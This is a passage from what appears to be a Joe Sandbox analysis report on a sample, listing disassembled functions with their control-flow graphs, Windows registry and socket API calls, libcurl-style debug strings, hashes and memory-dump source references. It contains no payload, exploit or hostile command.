                                                              • Opcode Fuzzy Hash: 8d6202968f86a8674a1d9505dde625f57a2713137a5139ee379a4d0f428742f1
                                                              • Instruction Fuzzy Hash: 47B1C0706043899FDB10CF26C985BA7B7A0AF41319F14852EF85D8B3D2DB78E854C766
                                                              Function 004B2F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1485 4b2f17-4b2f8c call 8ef570 call 8ef960 1490 4b31c9-4b31cd 1485->1490 1491 4b31d3-4b31d6 1490->1491 1492 4b2f91-4b2ff4 call 4b1619 RegOpenKeyExA 1490->1492 1495 4b2ffa-4b300b 1492->1495 1496 4b31c5 1492->1496 1497 4b315c-4b31ac RegEnumKeyExA 1495->1497 1496->1490 1498 4b31b2-4b31c2 1497->1498 1499 4b3010-4b3083 call 4b1619 RegOpenKeyExA 1497->1499 1498->1496 1503 4b3089-4b30d4 RegQueryValueExA 1499->1503 1504 4b314e-4b3152 1499->1504 1505 4b313b-4b314b RegCloseKey 1503->1505 1506 4b30d6-4b3137 call 8ef840 call 8ef8d0 call 8ef960 call 8ef770 call 8ef960 call 8edce0 1503->1506 1504->1497 1505->1504 1506->1505
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: de320e160b953cc180c3d57efac4164e36a3fceec7e84989b0125a9230aabd0b
                                                              • Instruction ID: f4ecb7cd57639d43258ec9e356dff2b95bfce9d6dc6668facae65cf6a5f40160
                                                              • Opcode Fuzzy Hash: de320e160b953cc180c3d57efac4164e36a3fceec7e84989b0125a9230aabd0b
                                                              • Instruction Fuzzy Hash: EB71B2B49043199FDB10EF69C58479EBBF0FF84308F10886DE89897311E7749A888F92
                                                              Function 004B76A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1519 4b76a0-4b76be 1520 4b76c0-4b76c7 1519->1520 1521 4b76e6-4b76f2 send 1519->1521 1520->1521 1524 4b76c9-4b76d1 1520->1524 1522 4b775e-4b7762 1521->1522 1523 4b76f4-4b7709 call 4b72a0 1521->1523 1523->1522 1526 4b770b-4b7759 call 4b72a0 call 4bcb20 call 838c50 1524->1526 1527 4b76d3-4b76e4 1524->1527 1526->1522 1527->1523
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=K,00000000,?,?,004C07BF), ref: 004B76EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=K$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3491406434
                                                              • Opcode ID: b22cb765e9d4674d62dce460d0befba41eb3e8e51b7aa88dc10252d27c2b2a9f
                                                              • Instruction ID: 2ea9d95becd5e1c96cccd57253c35b175aff90a55f29d115d9ff9b0d138a9571
                                                              • Opcode Fuzzy Hash: b22cb765e9d4674d62dce460d0befba41eb3e8e51b7aa88dc10252d27c2b2a9f
                                                              • Instruction Fuzzy Hash: 09113DF1608304BFD520A755ACC6D7B3F5CDBC2B2CF440A19FC4453352E5559C0182B2
                                                              Function 004E9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1638 4e9290-4e92ed call 4b76a0 1641 4e93c3-4e93ce 1638->1641 1642 4e92f3-4e92fb 1638->1642 1651 4e93e5-4e9427 call 4cd090 call 4f4f40 1641->1651 1652 4e93d0-4e93e1 1641->1652 1643 4e93aa-4e93af 1642->1643 1644 4e9301-4e9333 call 4cd8c0 call 4cd9a0 1642->1644 1645 4e9456-4e9470 1643->1645 1646 4e93b5-4e93bc 1643->1646 1663 4e93a7 1644->1663 1664 4e9335-4e9364 WSAIoctl 1644->1664 1649 4e93be 1646->1649 1650 4e9429-4e9431 1646->1650 1649->1645 1657 4e9439-4e943f 1650->1657 1658 4e9433-4e9437 1650->1658 1651->1645 1651->1650 1652->1646 1654 4e93e3 1652->1654 1654->1645 1657->1645 1661 4e9441-4e9453 call 4f50a0 1657->1661 1658->1645 1658->1657 1661->1645 1663->1643 1667 4e939b-4e93a4 1664->1667 1668 4e9366-4e936f 1664->1668 1667->1663 1668->1667 1670 4e9371-4e9390 setsockopt 1668->1670 1670->1667 1671 4e9392-4e9395 1670->1671 1671->1667
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 004E935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 004E9388
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 6949be2ba137e5b0a668576c15c345bf62b484b5fea8429598147548d7b126ad
                                                              • Instruction ID: 291276faff11cf044e1878bd5886298282116c5db2ffa27e50909c9ca580c941
                                                              • Opcode Fuzzy Hash: 6949be2ba137e5b0a668576c15c345bf62b484b5fea8429598147548d7b126ad
                                                              • Instruction Fuzzy Hash: A451CD71A04345ABD710DF25C881FAAB7A5FF88318F14862AFD488B3D2E734ED518B95
                                                              Function 004B7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1672 4b7770-4b778e 1673 4b7790-4b7797 1672->1673 1674 4b77b6-4b77c2 recv 1672->1674 1673->1674 1677 4b7799-4b77a1 1673->1677 1675 4b782e-4b7832 1674->1675 1676 4b77c4-4b77d9 call 4b72a0 1674->1676 1676->1675 1679 4b77db-4b7829 call 4b72a0 call 4bcb20 call 838c50 1677->1679 1680 4b77a3-4b77b4 1677->1680 1679->1675 1680->1676
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 42a6f2fdf3892d0a1d5afd489db3ed71ac6e1f0ade0aabbb28de01f7985c3969
                                                              • Instruction ID: 14b5d2ef498d125c47b75d900ee0fd0d695e53c658438711b1461e79717d6e34
                                                              • Opcode Fuzzy Hash: 42a6f2fdf3892d0a1d5afd489db3ed71ac6e1f0ade0aabbb28de01f7985c3969
                                                              • Instruction Fuzzy Hash: 8B112BF4608304BFE520E7199C8AE773F9CDBC6B5CF444619B84452352E5655C0181B2
                                                              Function 004B75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1691 4b75e0-4b75ed 1692 4b75ef-4b75f6 1691->1692 1693 4b7607-4b7629 socket 1691->1693 1692->1693 1694 4b75f8-4b75ff 1692->1694 1695 4b762b-4b763c call 4b72a0 1693->1695 1696 4b763f-4b7642 1693->1696 1697 4b7643-4b7699 call 4b72a0 call 4bcb20 call 838c50 1694->1697 1698 4b7601-4b7602 1694->1698 1695->1696 1698->1693
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: fe59381f6c6cb4cd2cb2416d8a3b891338ed5d074c1e7590a377829143e6983b
                                                              • Instruction ID: 71977b201c81cc6d2baa872bbf8a78748514f1c44809c5d594848e10804fde0c
                                                              • Opcode Fuzzy Hash: fe59381f6c6cb4cd2cb2416d8a3b891338ed5d074c1e7590a377829143e6983b
                                                              • Instruction Fuzzy Hash: 2B112971B45211A7DA20676D6C86EAB3B98DBC1778F450525F840962B3E2568C5182F1
                                                              Function 004EA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1876 4ea150-4ea159 1877 4ea15f-4ea17b 1876->1877 1878 4ea250 1876->1878 1879 4ea249-4ea24f 1877->1879 1880 4ea181-4ea1ce getsockname 1877->1880 1879->1878 1881 4ea1f7-4ea214 call 4eef30 1880->1881 1882 4ea1d0-4ea1f5 call 4cd090 1880->1882 1881->1879 1887 4ea216-4ea23b call 4cd090 1881->1887 1889 4ea240-4ea246 call 4f4f40 1882->1889 1887->1889 1889->1879
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 004EA1C7
                                                              Strings
                                                              • getsockname() failed with errno %d: %s, xrefs: 004EA1F0
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 004EA23B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: b519f5d88328d594289ccc2416235d3582fb364d82f7565dd7ac1d79e755db86
                                                              • Instruction ID: 9a743e954db172bf3fae30a8f3e7d93f9403a8038af193b8536d0efac8e62d31
                                                              • Opcode Fuzzy Hash: b519f5d88328d594289ccc2416235d3582fb364d82f7565dd7ac1d79e755db86
                                                              • Instruction Fuzzy Hash: 3A21FB31808280AAF7219B19DC42FE777ACEF91328F004655FA9853151FB32695587E6
                                                              Function 004CD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1896 4cd5e0-4cd5ee 1897 4cd5f0-4cd604 call 4cd690 1896->1897 1898 4cd652-4cd662 WSAStartup 1896->1898 1904 4cd61b-4cd651 call 4d7620 1897->1904 1905 4cd606-4cd614 1897->1905 1899 4cd664-4cd66f 1898->1899 1900 4cd670-4cd676 1898->1900 1900->1897 1902 4cd67c-4cd68d 1900->1902 1905->1904 1910 4cd616 1905->1910 1910->1904
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 004CD65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: bf1eedd9cd5186a6c3718188867819f147d894adf516ee7f3b3c99b6edad1908
                                                              • Instruction ID: 2eab1b953f421919c636a68f8dc73d211ec43dfa4c697a4538f98989aeb6c236
                                                              • Opcode Fuzzy Hash: bf1eedd9cd5186a6c3718188867819f147d894adf516ee7f3b3c99b6edad1908
                                                              • Instruction Fuzzy Hash: EB017BD4E403405AF750BB389D17B6735901B91304F4A157EA888912F3F72DC889C253
                                                              Function 0057AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1912 57aa30-57aa64 1914 57ab04-57ab09 1912->1914 1915 57aa6a-57aaa7 call 56e730 1912->1915 1916 57ae80-57ae89 1914->1916 1919 57ab0e-57ab13 1915->1919 1920 57aaa9-57aabd 1915->1920 1921 57ae2e 1919->1921 1922 57aabf-57aac7 1920->1922 1923 57ab18-57ab50 1920->1923 1925 57ae30-57ae4a call 56ea60 call 56ebf0 1921->1925 1922->1921 1924 57aacd-57ab02 1922->1924 1929 57ab58-57ab6d 1923->1929 1924->1929 1939 57ae75-57ae7d 1925->1939 1940 57ae4c-57ae57 1925->1940 1931 57ab96-57abab socket 1929->1931 1932 57ab6f-57ab73 1929->1932 1931->1921 1936 57abb1-57abc5 1931->1936 1932->1931 1934 57ab75-57ab8f 1932->1934 1934->1936 1953 57ab91 1934->1953 1937 57abc7-57abca 1936->1937 1938 57abd0-57abed ioctlsocket 1936->1938 1937->1938 1941 57ad2e-57ad39 1937->1941 1942 57ac10-57ac14 1938->1942 1943 57abef-57ac0a 1938->1943 1939->1916 1945 57ae6e-57ae74 1940->1945 1946 57ae59-57ae5e 1940->1946 1951 57ad52-57ad56 1941->1951 1952 57ad3b-57ad4c 1941->1952 1948 57ac37-57ac41 1942->1948 1949 57ac16-57ac31 1942->1949 1943->1942 1955 57ae29 1943->1955 1945->1939 1946->1945 1947 57ae60-57ae6c 1946->1947 1947->1939 1958 57ac43-57ac46 1948->1958 1959 57ac7a-57ac7e 1948->1959 1949->1948 1949->1955 1954 57ad5c-57ad6b 1951->1954 1951->1955 1952->1951 1952->1955 1953->1921 1963 57ad70-57ad78 1954->1963 1955->1921 1965 57ad04-57ad08 1958->1965 1966 57ac4c-57ac51 1958->1966 1960 57ace7-57acfe 1959->1960 1961 57ac80-57ac9b 1959->1961 1960->1965 1961->1960 1968 57ac9d-57acc1 1961->1968 1969 57ada0-57adae connect 1963->1969 1970 57ad7a-57ad7f 1963->1970 1965->1941 1971 57ad0a-57ad28 1965->1971 1966->1965 1972 57ac57-57ac78 1966->1972 1973 57acc6-57acd7 1968->1973 1975 57adb3-57adcf 1969->1975 1970->1969 1974 57ad81-57ad99 1970->1974 1971->1941 1971->1955 1972->1973 1973->1955 1981 57acdd-57ace5 1973->1981 1974->1975 1982 57add5-57add8 1975->1982 1983 57ae8a-57ae91 1975->1983 1981->1960 1981->1965 1984 57ade1-57adf1 1982->1984 1985 57adda-57addf 1982->1985 1983->1925 1986 57adf3-57ae07 1984->1986 1987 57ae0d-57ae12 1984->1987 1985->1963 1985->1984 1986->1987 1992 57aea8-57aead 1986->1992 1988 57ae14-57ae17 1987->1988 1989 57ae1a-57ae1c call 57af70 1987->1989 1988->1989 1993 57ae21-57ae23 1989->1993 1992->1925 1994 57ae25-57ae27 1993->1994 1995 57ae93-57ae9d 1993->1995 1994->1925 1996 57aeaf-57aeb1 call 56e760 1995->1996 1997 57ae9f-57aea6 call 56e7c0 1995->1997 2000 57aeb6-57aebe 1996->2000 1997->2000 2002 57aec0-57aedb call 56e180 2000->2002 2003 57af1a-57af1f 2000->2003 2002->1925 2006 57aee1-57aeec 2002->2006 2003->1925 2007 57af02-57af06 2006->2007 2008 57aeee-57aeff 2006->2008 2009 57af0e-57af15 2007->2009 2010 57af08-57af0b 2007->2010 2008->2007 2009->1916 2010->2009
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0057AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0057ABE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
